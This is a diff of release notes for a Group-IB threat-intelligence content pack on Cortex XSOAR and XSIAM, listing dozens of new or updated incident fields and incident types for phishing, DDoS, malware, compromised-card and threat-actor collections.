+<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Brand + +- New: Added a new incident field- GIB Phishing Brand that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Card Valid Thru + +- Updated the GIB Card Valid Thru incident field to support new collections. +##### New: GIB Downloaded From Table + +- New: Added a new incident field- GIB Downloaded From Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CNC + +- New: Added a new incident field- GIB CNC that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Events Information Table + +- New: Added a new incident field- GIB Compromised Events Information Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Request Body + +- New: Added a new incident field- GIB DDOS Request Body that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CNC URL + +- New: Added a new incident field- GIB CNC URL that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Email + +- Updated the GIB Email incident field to support new collections. +##### New: GIB Date First Seen + +- New: Added a new incident field- GIB Date First Seen that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Passwords + +- New: Added a new incident field- GIB Passwords that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Target Region + +- New: Added a new incident field- GIB Target Region that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB HTML + +- Updated the GIB HTML incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Malware + +- New: Added a new incident field- GIB Nation-State Cybercriminals Malware that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Admiralty Code + +- Updated the GIB Admiralty Code incident field to support new collections. +##### New: GIB Mirror Link + +- New: Added a new incident field- GIB Mirror Link that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Kit Source + +- New: Added a new incident field- GIB Phishing Kit Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Regions + +- New: Added a new incident field- GIB Cybercriminal Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Card Issuer + +- Updated the GIB Card Issuer incident field to support new collections. +##### New: GIB Phishing Objectives + +- New: Added a new incident field- GIB Phishing Objectives that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Source + +- Updated the GIB Source incident field to support new collections. +##### New: GIB Cybercriminal Malware + +- New: Added a new incident field- GIB Cybercriminal Malware that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### GIB Card Type + +- Updated the GIB Card Type incident field to support new collections. +##### New: GIB DDOS Date Registration + +- New: Added a new incident field- GIB DDOS Date Registration that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Title + +- Updated the GIB Title incident field to support new collections. +##### New: GIB Malware Aliases + +- New: Added a new incident field- GIB Malware Aliases that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Report Number + +- New: Added a new incident field- GIB Report Number that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Provider Domain + +- New: Added a new incident field- GIB Provider Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Registrar + +- New: Added a new incident field- GIB Phishing Registrar that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Created At + +- New: Added a new incident field- GIB Date Created At that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Threat Actor Country + +- New: Added a new incident field- GIB Threat Actor Country that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Service IP + +- New: Added a new incident field- GIB Service IP that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Nation-State Cybercriminals Threat Actor Goals + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Goals that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Reporter + +- New: Added a new incident field- GIB Reporter that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Favicon + +- Updated the GIB Favicon incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Actor Description + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Date Detected + +- New: Added a new incident field- GIB Phishing Date Detected that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Data Hash + +- Updated the GIB Data Hash incident field to support new collections. +##### New: GIB VPN Names + +- New: Added a new incident field- GIB VPN Names that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Matches Table + +- New: Added a new incident field- GIB Matches Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Actor Country + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Country that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Phishing Date Added + +- New: Added a new incident field- GIB Phishing Date Added that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Organization SWIFT + +- New: Added a new incident field- GIB Organization SWIFT that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CPE Table + +- New: Added a new incident field- GIB CPE Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Extended CVSS Exploitability + +- New: Added a new incident field- GIB Extended CVSS Exploitability that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Date Compromised + +- Updated the GIB Date Compromised incident field to support new collections. +##### New: GIB Extended CVSS Base + +- New: Added a new incident field- GIB Extended CVSS Base that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Regions + +- New: Added a new incident field- GIB Malware Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Date Expired + +- Updated the GIB Date Expired incident field to support new collections. +##### New: GIB Organization BIC + +- New: Added a new incident field- GIB Organization BIC that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Service Domain + +- New: Added a new incident field- GIB Service Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). 
+##### New: GIB Cybercriminal Threat Actor Reports Table + +- New: Added a new incident field- GIB Cybercriminal Threat Actor Reports Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Date Begin + +- New: Added a new incident field- GIB DDOS Date Begin that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Screenshot + +- Updated the GIB Screenshot incident field to support new collections. +##### New: GIB DDOS Date End + +- New: Added a new incident field- GIB DDOS Date End that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Extended CVSS Overall + +- New: Added a new incident field- GIB Extended CVSS Overall that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Name Servers + +- Updated the GIB Name Servers incident field to support new collections. +##### New: GIB Deface Date + +- New: Added a new incident field- GIB Deface Date that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Affected Software Table + +- New: Added a new incident field- GIB Affected Software Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Short Description + +- New: Added a new incident field- GIB Malware Short Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Related Indicators Data + +- Updated the GIB Related Indicators Data incident field to support new collections. +##### GIB Downloaded From + +- Updated the GIB Downloaded From incident field to support new collections. 
+##### New: GIB Target Domain Provider + +- New: Added a new incident field- GIB Target Domain Provider that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Protocol + +- New: Added a new incident field- GIB DDOS Protocol that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target ASN + +- New: Added a new incident field- GIB DDOS Target ASN that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Last Compromised + +- New: Added a new incident field- GIB Date Last Compromised that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Expertises + +- New: Added a new incident field- GIB Cybercriminal Expertises that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Langs + +- New: Added a new incident field- GIB Malware Langs that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Login + +- Updated the GIB Compromised Login incident field to support new collections. +##### New: GIB Extended CVSS Temporal + +- New: Added a new incident field- GIB Extended CVSS Temporal that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Leaked Data + +- Updated the GIB Leaked Data incident field to support new collections. +##### GIB Password + +- Updated the GIB Password incident field to support new collections. +##### GIB Threat Actor ID + +- Updated the GIB Threat Actor ID incident field to support new collections. 
+##### New: GIB Href + +- New: Added a new incident field- GIB Href that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Domain Puny + +- New: Added a new incident field- GIB Phishing Domain Puny that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Proxy Source + +- New: Added a new incident field- GIB Proxy Source that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing URLs + +- New: Added a new incident field- GIB Phishing URLs that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Domain + +- Updated the GIB Phishing Domain incident field to support new collections. +##### New: GIB Phishing IP Table + +- New: Added a new incident field- GIB Phishing IP Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Extended CVSS Impact + +- New: Added a new incident field- GIB Extended CVSS Impact that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Parsed Login Domain + +- New: Added a new incident field- GIB Parsed Login Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Description + +- New: Added a new incident field- GIB Malware Description that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Leak Name + +- Updated the GIB Leak Name incident field to support new collections. 
+##### GIB Threat Actor is APT
+
+- Updated the GIB Threat Actor is APT incident field to support new collections.
+##### New: GIB Proxy Sources
+
+- New: Added a new incident field- GIB Proxy Sources that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Deface Site URL
+
+- New: Added a new incident field- GIB Deface Site URL that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Malware CNC Domain
+
+- New: Added a new incident field- GIB Malware CNC Domain that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Parsed Login IP
+
+- New: Added a new incident field- GIB Parsed Login IP that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Target Category
+
+- Updated the GIB Target Category incident field to support new collections.
+##### New: GIB Bulletin Family
+
+- New: Added a new incident field- GIB Bulletin Family that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Target URL
+
+- New: Added a new incident field- GIB DDOS Target URL that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Duration
+
+- New: Added a new incident field- GIB DDOS Duration that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Sectors
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Sectors that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Cybercriminal Threat Title
+
+- New: Added a new incident field- GIB Cybercriminal Threat Title that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Target City
+
+- New: Added a new incident field- GIB Target City that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Leak Published
+
+- New: Added a new incident field- GIB Leak Published that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Target IP
+
+- New: Added a new incident field- GIB DDOS Target IP that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB CNC Domain
+
+- New: Added a new incident field- GIB CNC Domain that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Cybercriminal Threat Actor Aliases
+
+- New: Added a new incident field- GIB Cybercriminal Threat Actor Aliases that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Target Category
+
+- New: Added a new incident field- GIB DDOS Target Category that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Target ASN
+
+- New: Added a new incident field- GIB Target ASN that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Source
+
+- New: Added a new incident field- GIB DDOS Source that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Card Number
+
+- Updated the GIB Card Number incident field to support new collections.
+##### New: GIB Malware File hash
+
+- New: Added a new incident field- GIB Malware File hash that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Malware Categories
+
+- New: Added a new incident field- GIB Malware Categories that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Cybercriminal Threat Actor Description
+
+- New: Added a new incident field- GIB Cybercriminal Threat Actor Description that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Title
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Title that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Phishing Status
+
+- Updated the GIB Phishing Status incident field to support new collections.
+##### New: GIB Has Exploit
+
+- New: Added a new incident field- GIB Has Exploit that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Phishing Kit Table
+
+- New: Added a new incident field- GIB Phishing Kit Table that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Service URL
+
+- New: Added a new incident field- GIB Service URL that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Inject MD5
+
+- Updated the GIB Inject MD5 incident field to support new collections.
+##### GIB Phishing Type
+
+- Updated the GIB Phishing Type incident field to support new collections.
+##### New: GIB Date Add
+
+- New: Added a new incident field- GIB Date Add that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB CVV
+
+- Updated the GIB CVV incident field to support new collections.
+##### New: GIB Phishing Domain Expiration Date
+
+- New: Added a new incident field- GIB Phishing Domain Expiration Date that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Portal Link
+
+- Updated the GIB Portal Link incident field to support new collections.
+##### New: GIB Date Updated At
+
+- New: Added a new incident field- GIB Date Updated At that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Threat Actors Table
+
+- New: Added a new incident field- GIB Threat Actors Table that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Person
+
+- Updated the GIB Person incident field to support new collections.
+##### New: GIB Compromised Account
+
+- New: Added a new incident field- GIB Compromised Account that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Credibility
+
+- Updated the GIB Credibility incident field to support new collections.
+##### GIB Severity
+
+- Updated the GIB Severity incident field to support new collections.
+##### New: GIB DDOS Target Region
+
+- New: Added a new incident field- GIB DDOS Target Region that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Target Domain
+
+- Updated the GIB Target Domain incident field to support new collections.
+##### New: GIB Extended Description
+
+- New: Added a new incident field- GIB Extended Description that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Threat Actor Name
+
+- Updated the GIB Threat Actor Name incident field to support new collections.
+##### New: GIB Date Incident
+
+- New: Added a new incident field- GIB Date Incident that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Socks Proxy Source
+
+- New: Added a new incident field- GIB Socks Proxy Source that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Link List Table
+
+- New: Added a new incident field- GIB Link List Table that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Merged Cvss
+
+- New: Added a new incident field- GIB Merged Cvss that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Update Time
+
+- New: Added a new incident field- GIB Update Time that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB GIT Source
+
+- New: Added a new incident field- GIB GIT Source that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Sectors
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Sectors that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB CNC Port
+
+- New: Added a new incident field- GIB CNC Port that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Date of Detection
+
+- Updated the GIB Date of Detection incident field to support new collections.
+##### New: GIB Cybercriminal Sectors
+
+- New: Added a new incident field- GIB Cybercriminal Sectors that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Address
+
+- Updated the GIB Address incident field to support new collections.
+##### New: GIB Proxy Type
+
+- New: Added a new incident field- GIB Proxy Type that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Actor Reports Table
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Reports Table that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Phishing Kit Emails
+
+- Updated the GIB Phishing Kit Emails incident field to support new collections.
+##### New: CPE Table
+
+- New: Added a new incident field- CPE Table that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Date Created
+
+- Updated the GIB Date Created incident field to support new collections.
+##### New: GIB DDOS Request Body Hash
+
+- New: Added a new incident field- GIB DDOS Request Body Hash that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Request Data Link
+
+- New: Added a new incident field- GIB DDOS Request Data Link that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Report Number
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Report Number that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Victim IP
+
+- Updated the GIB Victim IP incident field to support new collections.
+##### New: GIB Upload Time
+
+- New: Added a new incident field- GIB Upload Time that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Target Provider
+
+- New: Added a new incident field- GIB DDOS Target Provider that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Reliability
+
+- Updated the GIB Reliability incident field to support new collections.
+##### New: GIB Nation-State Cybercriminals Regions
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Regions that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB DDOS Type
+
+- New: Added a new incident field- GIB DDOS Type that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Actor Labels
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Labels that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Organization CLABE
+
+- New: Added a new incident field- GIB Organization CLABE that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB ID
+
+- Updated the GIB ID incident field to support new collections.
+##### New: GIB Date Modified
+
+- New: Added a new incident field- GIB Date Modified that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Target IP
+
+- New: Added a new incident field- GIB Target IP that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Expertises
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Expertises that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Scanner Categories
+
+- New: Added a new incident field- GIB Scanner Categories that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Description
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Description that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Country Name
+
+- New: Added a new incident field- GIB Country Name that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Leaked File Name
+
+- Updated the GIB Leaked File Name incident field to support new collections.
+##### New: GIB DDOS Request Headers Hash
+
+- New: Added a new incident field- GIB DDOS Request Headers Hash that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Threat Level
+
+- New: Added a new incident field- GIB Threat Level that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Phishing Date Blocked
+
+- Updated the GIB Phishing Date Blocked incident field to support new collections.
+##### New: GIB Vulnerability Type
+
+- New: Added a new incident field- GIB Vulnerability Type that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB VPN Sources
+
+- New: Added a new incident field- GIB VPN Sources that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
 #### Incident Types
-- New: **GIB Attacks DDOS**
-- New: **GIB Compromised Account Group**
-- New: **GIB Attacks Deface**
-- **GIB OSI Git Leak**
-- **GIB Compromised Account**
-- **GIB Brand Protection Phishing Kit**
-- **GIB Brand Protection Phishing**
-- New: **GIB Nation-State Cybercriminals Threat Actor**
-- New: **GIB Malware**
-- New: **GIB Suspicious IP Open Proxy**
-- **GIB Targeted Malware**
-- New: **GIB Attacks Phishing Kit**
-- New: **GIB Cybercriminal Threat**
-- New: **GIB Suspicious IP Socks Proxy**
-- New: **GIB Cybercriminal Threat Actor**
-- New: **GIB APT Threat**
-- New: **GIB Nation-State Cybercriminals Threat**
-- New: **GIB Suspicious IP Scanner**
-- New: **GIB Suspicious IP VPN**
-- New: **GIB Suspicious IP TOR Node**
-- New: **GIB Attacks Phishing Group**
-- New: **GIB Compromised Card Group**
-- **GIB Compromised Card**
-- New: **GIB OSI Vulnerability**
-- **GIB OSI Public Leak**
-- **GIB Data Breach**
-- New: **GIB Compromised Mule**
-- New: **GIB Malware CNC**
+##### New: GIB Cybercriminal Threat Actor
+
+- New: Added a new incident type- GIB Cybercriminal Threat Actor that support new collections
